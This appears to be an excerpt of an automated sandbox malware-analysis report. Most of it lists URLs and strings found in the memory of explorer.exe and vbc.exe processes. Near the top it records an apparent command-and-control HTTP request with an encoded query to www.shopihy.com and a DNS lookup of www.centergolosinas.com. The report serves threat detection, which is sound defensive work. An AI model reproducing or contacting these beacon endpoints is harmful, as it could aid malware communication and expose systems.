          Source: global trafficHTTP traffic detected: GET /p2io/?oN6xpP=Ei6RqbmoUXtm0NxuUyb/BZtLNDk4B448l51n8Zz8P/g/u3IBdZc5bEJpDCmkA548du9Vog==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.shopihy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.centergolosinas.com
          Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2182872595.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2204888714.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2182475008.0000000001202000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2230139521.0000000001202000.00000020.00020000.sdmpString found in binary or memory: http://weather.gc.ca/astro/seeing_e.html)
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
